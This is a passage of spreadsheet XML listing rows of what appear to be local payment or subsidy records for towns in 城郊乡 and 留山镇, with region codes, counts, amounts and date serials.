      <c r="H1233" s="14">
        <v>295</v>
      </c>
      <c r="I1233" s="14">
        <f t="shared" si="62"/>
        <v>885</v>
      </c>
      <c r="J1233" s="24">
        <v>45108</v>
      </c>
      <c r="K1233" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1234" ht="23" customHeight="1" spans="1:11">
      <c r="A1234" s="13" t="s">
        <v>3290</v>
      </c>
      <c r="B1234" s="14" t="str">
        <f>B1233</f>
        <v>城郊乡</v>
      </c>
      <c r="C1234" s="14" t="str">
        <f>C1233</f>
        <v>城郊校委会</v>
      </c>
      <c r="D1234" s="13" t="s">
        <v>3291</v>
      </c>
      <c r="E1234" s="14" t="s">
        <v>3292</v>
      </c>
      <c r="F1234" s="14" t="str">
        <f>F1233</f>
        <v>4113210299</v>
      </c>
      <c r="G1234" s="14"/>
      <c r="H1234" s="14"/>
      <c r="I1234" s="14"/>
      <c r="J1234" s="14"/>
      <c r="K1234" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1235" ht="23" customHeight="1" spans="1:11">
      <c r="A1235" s="13" t="s">
        <v>3293</v>
      </c>
      <c r="B1235" s="14" t="str">
        <f>B1234</f>
        <v>城郊乡</v>
      </c>
      <c r="C1235" s="14" t="str">
        <f>C1234</f>
        <v>城郊校委会</v>
      </c>
      <c r="D1235" s="13" t="s">
        <v>3294</v>
      </c>
      <c r="E1235" s="18" t="s">
        <v>3295</v>
      </c>
      <c r="F1235" s="14" t="str">
        <f>F1234</f>
        <v>4113210299</v>
      </c>
      <c r="G1235" s="14"/>
      <c r="H1235" s="14"/>
      <c r="I1235" s="14"/>
      <c r="J1235" s="14"/>
      <c r="K1235" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1236" ht="23" customHeight="1" spans="1:11">
      <c r="A1236" s="13" t="s">
        <v>3296</v>
      </c>
      <c r="B1236" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1236" s="14" t="s">
        <v>3297</v>
      </c>
      <c r="D1236" s="14" t="s">
        <v>3298</v>
      </c>
      <c r="E1236" s="14" t="s">
        <v>3299</v>
      </c>
      <c r="F1236" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1236" s="14">
        <v>1</v>
      </c>
      <c r="H1236" s="14">
        <v>340</v>
      </c>
      <c r="I1236" s="14">
        <f>H1236*G1236</f>
        <v>340</v>
      </c>
      <c r="J1236" s="14">
        <v>45261</v>
      </c>
      <c r="K1236" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1237" ht="23" customHeight="1" spans="1:11">
      <c r="A1237" s="13" t="s">
        <v>3300</v>
      </c>
      <c r="B1237" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1237" s="14" t="s">
        <v>3301</v>
      </c>
      <c r="D1237" s="14" t="s">
        <v>1858</v>
      </c>
      <c r="E1237" s="14" t="s">
        <v>3214</v>
      </c>
      <c r="F1237" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1237" s="14">
        <v>1</v>
      </c>
      <c r="H1237" s="14">
        <v>340</v>
      </c>
      <c r="I1237" s="14">
        <f>H1237*G1237</f>
        <v>340</v>
      </c>
      <c r="J1237" s="24">
        <v>45108</v>
      </c>
      <c r="K1237" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1238" ht="23" customHeight="1" spans="1:11">
      <c r="A1238" s="13" t="s">
        <v>3302</v>
      </c>
      <c r="B1238" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1238" s="14" t="s">
        <v>3301</v>
      </c>
      <c r="D1238" s="14" t="s">
        <v>3303</v>
      </c>
      <c r="E1238" s="14" t="s">
        <v>3304</v>
      </c>
      <c r="F1238" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1238" s="14">
        <v>1</v>
      </c>
      <c r="H1238" s="14">
        <v>340</v>
      </c>
      <c r="I1238" s="14">
        <f>H1238*G1238</f>
        <v>340</v>
      </c>
      <c r="J1238" s="24">
        <v>45108</v>
      </c>
      <c r="K1238" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1239" ht="23" customHeight="1" spans="1:11">
      <c r="A1239" s="13" t="s">
        <v>3305</v>
      </c>
      <c r="B1239" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1239" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1239" s="14" t="s">
        <v>3307</v>
      </c>
      <c r="E1239" s="14" t="s">
        <v>3308</v>
      </c>
      <c r="F1239" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1239" s="14">
        <v>2</v>
      </c>
      <c r="H1239" s="14">
        <v>300</v>
      </c>
      <c r="I1239" s="14">
        <f>H1239*G1239</f>
        <v>600</v>
      </c>
      <c r="J1239" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1239" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1240" ht="23" customHeight="1" spans="1:11">
      <c r="A1240" s="13" t="s">
        <v>3309</v>
      </c>
      <c r="B1240" s="14" t="str">
        <f>B1239</f>
        <v>留山镇</v>
      </c>
      <c r="C1240" s="14" t="str">
        <f>C1239</f>
        <v>留山镇</v>
      </c>
      <c r="D1240" s="13" t="s">
        <v>3310</v>
      </c>
      <c r="E1240" s="13" t="s">
        <v>3311</v>
      </c>
      <c r="F1240" s="14">
        <f>F1239</f>
        <v>4113210399</v>
      </c>
      <c r="G1240" s="14"/>
      <c r="H1240" s="14"/>
      <c r="I1240" s="14"/>
      <c r="J1240" s="14"/>
      <c r="K1240" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1241" ht="23" customHeight="1" spans="1:11">
      <c r="A1241" s="13" t="s">
        <v>3312</v>
      </c>
      <c r="B1241" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1241" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1241" s="14" t="s">
        <v>3313</v>
      </c>
      <c r="E1241" s="14" t="s">
        <v>3314</v>
      </c>
      <c r="F1241" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1241" s="14">
        <v>1</v>
      </c>
      <c r="H1241" s="14">
        <v>340</v>
      </c>
      <c r="I1241" s="14">
        <f>H1241*G1241</f>
        <v>340</v>
      </c>
      <c r="J1241" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1241" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1242" ht="23" customHeight="1" spans="1:11">
      <c r="A1242" s="13" t="s">
        <v>3315</v>
      </c>
      <c r="B1242" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1242" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1242" s="14" t="s">
        <v>3316</v>
      </c>
      <c r="E1242" s="14" t="s">
        <v>3317</v>
      </c>
      <c r="F1242" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1242" s="14">
        <v>2</v>
      </c>
      <c r="H1242" s="14">
        <v>300</v>
      </c>
      <c r="I1242" s="14">
        <f>H1242*G1242</f>
        <v>600</v>
      </c>
      <c r="J1242" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1242" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1243" ht="23" customHeight="1" spans="1:11">
      <c r="A1243" s="13" t="s">
        <v>3318</v>
      </c>
      <c r="B1243" s="14" t="str">
        <f>B1242</f>
        <v>留山镇</v>
      </c>
      <c r="C1243" s="14" t="str">
        <f>C1242</f>
        <v>留山镇</v>
      </c>
      <c r="D1243" s="13" t="s">
        <v>3319</v>
      </c>
      <c r="E1243" s="13" t="s">
        <v>3320</v>
      </c>
      <c r="F1243" s="14">
        <f>F1242</f>
        <v>4113210399</v>
      </c>
      <c r="G1243" s="14"/>
      <c r="H1243" s="14"/>
      <c r="I1243" s="14"/>
      <c r="J1243" s="14"/>
      <c r="K1243" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1244" ht="23" customHeight="1" spans="1:11">
      <c r="A1244" s="13" t="s">
        <v>3321</v>
      </c>
      <c r="B1244" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1244" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1244" s="14" t="s">
        <v>3322</v>
      </c>
      <c r="E1244" s="14" t="s">
        <v>3323</v>
      </c>
      <c r="F1244" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1244" s="14">
        <v>1</v>
      </c>
      <c r="H1244" s="14">
        <v>340</v>
      </c>
      <c r="I1244" s="14">
        <f>H1244*G1244</f>
        <v>340</v>
      </c>
      <c r="J1244" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1244" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1245" ht="23" customHeight="1" spans="1:11">
      <c r="A1245" s="13" t="s">
        <v>3324</v>
      </c>
      <c r="B1245" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1245" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1245" s="14" t="s">
        <v>3325</v>
      </c>
      <c r="E1245" s="14" t="s">
        <v>3326</v>
      </c>
      <c r="F1245" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1245" s="14">
        <v>2</v>
      </c>
      <c r="H1245" s="14">
        <v>300</v>
      </c>
      <c r="I1245" s="14">
        <f>H1245*G1245</f>
        <v>600</v>
      </c>
      <c r="J1245" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1245" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1246" ht="23" customHeight="1" spans="1:11">
      <c r="A1246" s="13" t="s">
        <v>3327</v>
      </c>
      <c r="B1246" s="14" t="str">
        <f>B1245</f>
        <v>留山镇</v>
      </c>
      <c r="C1246" s="14" t="str">
        <f>C1245</f>
        <v>留山镇</v>
      </c>
      <c r="D1246" s="13" t="s">
        <v>3328</v>
      </c>
      <c r="E1246" s="13" t="s">
        <v>3329</v>
      </c>
      <c r="F1246" s="14">
        <f>F1245</f>
        <v>4113210399</v>
      </c>
      <c r="G1246" s="14"/>
      <c r="H1246" s="14"/>
      <c r="I1246" s="14"/>
      <c r="J1246" s="14"/>
      <c r="K1246" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1247" ht="23" customHeight="1" spans="1:11">
      <c r="A1247" s="13" t="s">
        <v>3330</v>
      </c>
      <c r="B1247" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1247" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1247" s="14" t="s">
        <v>3331</v>
      </c>
      <c r="E1247" s="14" t="s">
        <v>3320</v>
      </c>
      <c r="F1247" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1247" s="14">
        <v>1</v>
      </c>
      <c r="H1247" s="14">
        <v>340</v>
      </c>
      <c r="I1247" s="14">
        <f>H1247*G1247</f>
        <v>340</v>
      </c>
      <c r="J1247" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1247" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1248" ht="23" customHeight="1" spans="1:11">
      <c r="A1248" s="13" t="s">
        <v>3332</v>
      </c>
      <c r="B1248" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1248" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1248" s="14" t="s">
        <v>3333</v>
      </c>
      <c r="E1248" s="14" t="s">
        <v>3334</v>
      </c>
      <c r="F1248" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1248" s="14">
        <v>1</v>
      </c>
      <c r="H1248" s="14">
        <v>340</v>
      </c>
      <c r="I1248" s="14">
        <f>H1248*G1248</f>
        <v>340</v>
      </c>
      <c r="J1248" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1248" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1249" ht="23" customHeight="1" spans="1:11">
      <c r="A1249" s="13" t="s">
        <v>3335</v>
      </c>
      <c r="B1249" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1249" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1249" s="14" t="s">
        <v>3336</v>
      </c>
      <c r="E1249" s="14" t="s">
        <v>3323</v>
      </c>
      <c r="F1249" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1249" s="14">
        <v>1</v>
      </c>
      <c r="H1249" s="14">
        <v>340</v>
      </c>
      <c r="I1249" s="14">
        <f>H1249*G1249</f>
        <v>340</v>
      </c>
      <c r="J1249" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1249" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1250" ht="23" customHeight="1" spans="1:11">
      <c r="A1250" s="13" t="s">
        <v>3337</v>
      </c>
      <c r="B1250" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1250" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1250" s="14" t="s">
        <v>3338</v>
      </c>
      <c r="E1250" s="14" t="s">
        <v>3339</v>
      </c>
      <c r="F1250" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1250" s="14">
        <v>2</v>
      </c>
      <c r="H1250" s="14">
        <v>300</v>
      </c>
      <c r="I1250" s="14">
        <f>H1250*G1250</f>
        <v>600</v>
      </c>
      <c r="J1250" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1250" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1251" ht="23" customHeight="1" spans="1:11">
      <c r="A1251" s="13" t="s">
        <v>3340</v>
      </c>
      <c r="B1251" s="14" t="str">
        <f>B1250</f>
        <v>留山镇</v>
      </c>
      <c r="C1251" s="14" t="str">
        <f>C1250</f>
        <v>留山镇</v>
      </c>
      <c r="D1251" s="13" t="s">
        <v>3341</v>
      </c>
      <c r="E1251" s="13" t="s">
        <v>3342</v>
      </c>
      <c r="F1251" s="14">
        <f>F1250</f>
        <v>4113210399</v>
      </c>
      <c r="G1251" s="14"/>
      <c r="H1251" s="14"/>
      <c r="I1251" s="14"/>
      <c r="J1251" s="14"/>
      <c r="K1251" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1252" ht="23" customHeight="1" spans="1:11">
      <c r="A1252" s="13" t="s">
        <v>3343</v>
      </c>
      <c r="B1252" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1252" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1252" s="14" t="s">
        <v>3344</v>
      </c>
      <c r="E1252" s="14" t="s">
        <v>3345</v>
      </c>
      <c r="F1252" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1252" s="14">
        <v>1</v>
      </c>
      <c r="H1252" s="14">
        <v>340</v>
      </c>
      <c r="I1252" s="14">
        <f>H1252*G1252</f>
        <v>340</v>
      </c>
      <c r="J1252" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1252" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1253" ht="23" customHeight="1" spans="1:11">
      <c r="A1253" s="13" t="s">
        <v>3346</v>
      </c>
      <c r="B1253" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1253" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1253" s="14" t="s">
        <v>3347</v>
      </c>
      <c r="E1253" s="14" t="s">
        <v>3311</v>
      </c>
      <c r="F1253" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1253" s="14">
        <v>1</v>
      </c>
      <c r="H1253" s="14">
        <v>340</v>
      </c>
      <c r="I1253" s="14">
        <f>H1253*G1253</f>
        <v>340</v>
      </c>
      <c r="J1253" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1253" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1254" ht="23" customHeight="1" spans="1:11">
      <c r="A1254" s="13" t="s">
        <v>3348</v>
      </c>
      <c r="B1254" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1254" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1254" s="14" t="s">
        <v>3349</v>
      </c>
      <c r="E1254" s="14" t="s">
        <v>3350</v>
      </c>
      <c r="F1254" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1254" s="14">
        <v>2</v>
      </c>
      <c r="H1254" s="14">
        <v>320</v>
      </c>
      <c r="I1254" s="14">
        <f>H1254*G1254</f>
        <v>640</v>
      </c>
      <c r="J1254" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1254" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1255" ht="23" customHeight="1" spans="1:11">
      <c r="A1255" s="13" t="s">
        <v>3351</v>
      </c>
      <c r="B1255" s="14" t="str">
        <f>B1254</f>
        <v>留山镇</v>
      </c>
      <c r="C1255" s="14" t="str">
        <f>C1254</f>
        <v>留山镇</v>
      </c>
      <c r="D1255" s="13" t="s">
        <v>3352</v>
      </c>
      <c r="E1255" s="13" t="s">
        <v>3353</v>
      </c>
      <c r="F1255" s="14">
        <f>F1254</f>
        <v>4113210399</v>
      </c>
      <c r="G1255" s="14"/>
      <c r="H1255" s="14"/>
      <c r="I1255" s="14"/>
      <c r="J1255" s="14"/>
      <c r="K1255" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1256" ht="23" customHeight="1" spans="1:11">
      <c r="A1256" s="13" t="s">
        <v>3354</v>
      </c>
      <c r="B1256" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1256" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1256" s="14" t="s">
        <v>3355</v>
      </c>
      <c r="E1256" s="14" t="s">
        <v>3356</v>
      </c>
      <c r="F1256" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1256" s="14">
        <v>1</v>
      </c>
      <c r="H1256" s="14">
        <v>340</v>
      </c>
      <c r="I1256" s="14">
        <f>H1256*G1256</f>
        <v>340</v>
      </c>
      <c r="J1256" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1256" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1257" ht="23" customHeight="1" spans="1:11">
      <c r="A1257" s="13" t="s">
        <v>3357</v>
      </c>
      <c r="B1257" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1257" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1257" s="14" t="s">
        <v>3358</v>
      </c>
      <c r="E1257" s="14" t="s">
        <v>3359</v>
      </c>
      <c r="F1257" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1257" s="14">
        <v>1</v>
      </c>
      <c r="H1257" s="14">
        <v>340</v>
      </c>
      <c r="I1257" s="14">
        <f>H1257*G1257</f>
        <v>340</v>
      </c>
      <c r="J1257" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1257" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1258" ht="23" customHeight="1" spans="1:11">
      <c r="A1258" s="13" t="s">
        <v>3360</v>
      </c>
      <c r="B1258" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1258" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1258" s="14" t="s">
        <v>3361</v>
      </c>
      <c r="E1258" s="14" t="s">
        <v>3362</v>
      </c>
      <c r="F1258" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1258" s="14">
        <v>2</v>
      </c>
      <c r="H1258" s="14">
        <v>300</v>
      </c>
      <c r="I1258" s="14">
        <f>H1258*G1258</f>
        <v>600</v>
      </c>
      <c r="J1258" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1258" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1259" ht="23" customHeight="1" spans="1:11">
      <c r="A1259" s="13" t="s">
        <v>3363</v>
      </c>
      <c r="B1259" s="14" t="str">
        <f>B1258</f>
        <v>留山镇</v>
      </c>
      <c r="C1259" s="14" t="str">
        <f>C1258</f>
        <v>留山镇</v>
      </c>
      <c r="D1259" s="36" t="s">
        <v>3364</v>
      </c>
      <c r="E1259" s="37" t="s">
        <v>3365</v>
      </c>
      <c r="F1259" s="14">
        <f>F1258</f>
        <v>4113210399</v>
      </c>
      <c r="G1259" s="14"/>
      <c r="H1259" s="14"/>
      <c r="I1259" s="14"/>
      <c r="J1259" s="14"/>
      <c r="K1259" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1260" ht="23" customHeight="1" spans="1:11">
      <c r="A1260" s="13" t="s">
        <v>3366</v>
      </c>
      <c r="B1260" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1260" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1260" s="14" t="s">
        <v>3367</v>
      </c>
      <c r="E1260" s="14" t="s">
        <v>3368</v>
      </c>
      <c r="F1260" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1260" s="14">
        <v>2</v>
      </c>
      <c r="H1260" s="14">
        <v>300</v>
      </c>
      <c r="I1260" s="14">
        <f>H1260*G1260</f>
        <v>600</v>
      </c>
      <c r="J1260" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1260" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1261" ht="23" customHeight="1" spans="1:11">
      <c r="A1261" s="13" t="s">
        <v>3369</v>
      </c>
      <c r="B1261" s="14" t="str">
        <f>B1260</f>
        <v>留山镇</v>
      </c>
      <c r="C1261" s="14" t="str">
        <f>C1260</f>
        <v>留山镇</v>
      </c>
      <c r="D1261" s="13" t="s">
        <v>3370</v>
      </c>
      <c r="E1261" s="13" t="s">
        <v>3371</v>
      </c>
      <c r="F1261" s="14">
        <f>F1260</f>
        <v>4113210399</v>
      </c>
      <c r="G1261" s="14"/>
      <c r="H1261" s="14"/>
      <c r="I1261" s="14"/>
      <c r="J1261" s="14"/>
      <c r="K1261" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1262" ht="23" customHeight="1" spans="1:11">
      <c r="A1262" s="13" t="s">
        <v>3372</v>
      </c>
      <c r="B1262" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1262" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1262" s="14" t="s">
        <v>3373</v>
      </c>
      <c r="E1262" s="14" t="s">
        <v>3374</v>
      </c>
      <c r="F1262" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1262" s="14">
        <v>2</v>
      </c>
      <c r="H1262" s="14">
        <v>300</v>
      </c>
      <c r="I1262" s="14">
        <f>H1262*G1262</f>
        <v>600</v>
      </c>
      <c r="J1262" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1262" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1263" ht="23" customHeight="1" spans="1:11">
      <c r="A1263" s="13" t="s">
        <v>3375</v>
      </c>
      <c r="B1263" s="14" t="str">
        <f>B1262</f>
        <v>留山镇</v>
      </c>
      <c r="C1263" s="14" t="str">
        <f>C1262</f>
        <v>留山镇</v>
      </c>
      <c r="D1263" s="13" t="s">
        <v>3376</v>
      </c>
      <c r="E1263" s="13" t="s">
        <v>3377</v>
      </c>
      <c r="F1263" s="14">
        <f>F1262</f>
        <v>4113210399</v>
      </c>
      <c r="G1263" s="14"/>
      <c r="H1263" s="14"/>
      <c r="I1263" s="14"/>
      <c r="J1263" s="14"/>
      <c r="K1263" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1264" ht="23" customHeight="1" spans="1:11">
      <c r="A1264" s="13" t="s">
        <v>3378</v>
      </c>
      <c r="B1264" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1264" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1264" s="14" t="s">
        <v>3379</v>
      </c>
      <c r="E1264" s="14" t="s">
        <v>3380</v>
      </c>
      <c r="F1264" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1264" s="14">
        <v>2</v>
      </c>
      <c r="H1264" s="14">
        <v>300</v>
      </c>
      <c r="I1264" s="14">
        <f>H1264*G1264</f>
        <v>600</v>
      </c>
      <c r="J1264" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1264" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1265" ht="23" customHeight="1" spans="1:11">
      <c r="A1265" s="13" t="s">
        <v>3381</v>
      </c>
      <c r="B1265" s="14" t="str">
        <f>B1264</f>
        <v>留山镇</v>
      </c>
      <c r="C1265" s="14" t="str">
        <f>C1264</f>
        <v>留山镇</v>
      </c>
      <c r="D1265" s="13" t="s">
        <v>3382</v>
      </c>
      <c r="E1265" s="13" t="s">
        <v>3383</v>
      </c>
      <c r="F1265" s="14">
        <f>F1264</f>
        <v>4113210399</v>
      </c>
      <c r="G1265" s="14"/>
      <c r="H1265" s="14"/>
      <c r="I1265" s="14"/>
      <c r="J1265" s="14"/>
      <c r="K1265" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1266" ht="23" customHeight="1" spans="1:11">
      <c r="A1266" s="13" t="s">
        <v>3384</v>
      </c>
      <c r="B1266" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1266" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1266" s="14" t="s">
        <v>3385</v>
      </c>
      <c r="E1266" s="14" t="s">
        <v>3386</v>
      </c>
      <c r="F1266" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1266" s="14">
        <v>2</v>
      </c>
      <c r="H1266" s="14">
        <v>300</v>
      </c>
      <c r="I1266" s="14">
        <f>H1266*G1266</f>
        <v>600</v>
      </c>
      <c r="J1266" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1266" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1267" ht="23" customHeight="1" spans="1:11">
      <c r="A1267" s="13" t="s">
        <v>3387</v>
      </c>
      <c r="B1267" s="14" t="str">
        <f>B1266</f>
        <v>留山镇</v>
      </c>
      <c r="C1267" s="14" t="str">
        <f>C1266</f>
        <v>留山镇</v>
      </c>
      <c r="D1267" s="13" t="s">
        <v>3388</v>
      </c>
      <c r="E1267" s="13" t="s">
        <v>3389</v>
      </c>
      <c r="F1267" s="14">
        <f>F1266</f>
        <v>4113210399</v>
      </c>
      <c r="G1267" s="14"/>
      <c r="H1267" s="14"/>
      <c r="I1267" s="14"/>
      <c r="J1267" s="14"/>
      <c r="K1267" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1268" ht="23" customHeight="1" spans="1:11">
      <c r="A1268" s="13" t="s">
        <v>3390</v>
      </c>
      <c r="B1268" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1268" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1268" s="14" t="s">
        <v>3391</v>
      </c>
      <c r="E1268" s="14" t="s">
        <v>3392</v>
      </c>
      <c r="F1268" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1268" s="14">
        <v>2</v>
      </c>
      <c r="H1268" s="14">
        <v>300</v>
      </c>
      <c r="I1268" s="14">
        <f>H1268*G1268</f>
        <v>600</v>
      </c>
      <c r="J1268" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1268" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1269" ht="23" customHeight="1" spans="1:11">
      <c r="A1269" s="13" t="s">
        <v>3393</v>
      </c>
      <c r="B1269" s="14" t="str">
        <f>B1268</f>
        <v>留山镇</v>
      </c>
      <c r="C1269" s="14" t="str">
        <f>C1268</f>
        <v>留山镇</v>
      </c>
      <c r="D1269" s="13" t="s">
        <v>3394</v>
      </c>
      <c r="E1269" s="13" t="s">
        <v>3371</v>
      </c>
      <c r="F1269" s="14">
        <f>F1268</f>
        <v>4113210399</v>
      </c>
      <c r="G1269" s="14"/>
      <c r="H1269" s="14"/>
      <c r="I1269" s="14"/>
      <c r="J1269" s="14"/>
      <c r="K1269" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1270" ht="23" customHeight="1" spans="1:11">
      <c r="A1270" s="13" t="s">
        <v>3395</v>
      </c>
      <c r="B1270" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1270" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1270" s="14" t="s">
        <v>3396</v>
      </c>
      <c r="E1270" s="14" t="s">
        <v>3374</v>
      </c>
      <c r="F1270" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1270" s="14">
        <v>1</v>
      </c>
      <c r="H1270" s="14">
        <v>340</v>
      </c>
      <c r="I1270" s="14">
        <f>H1270*G1270</f>
        <v>340</v>
      </c>
      <c r="J1270" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1270" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1271" ht="23" customHeight="1" spans="1:11">
      <c r="A1271" s="13" t="s">
        <v>3397</v>
      </c>
      <c r="B1271" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1271" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1271" s="14" t="s">
        <v>876</v>
      </c>
      <c r="E1271" s="14" t="s">
        <v>3311</v>
      </c>
      <c r="F1271" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1271" s="14">
        <v>1</v>
      </c>
      <c r="H1271" s="14">
        <v>340</v>
      </c>
      <c r="I1271" s="14">
        <f>H1271*G1271</f>
        <v>340</v>
      </c>
      <c r="J1271" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1271" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1272" ht="23" customHeight="1" spans="1:11">
      <c r="A1272" s="13" t="s">
        <v>3398</v>
      </c>
      <c r="B1272" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1272" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1272" s="14" t="s">
        <v>3399</v>
      </c>
      <c r="E1272" s="14" t="s">
        <v>3400</v>
      </c>
      <c r="F1272" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1272" s="14">
        <v>1</v>
      </c>
      <c r="H1272" s="14">
        <v>340</v>
      </c>
      <c r="I1272" s="14">
        <f>H1272*G1272</f>
        <v>340</v>
      </c>
      <c r="J1272" s="14" t="s">
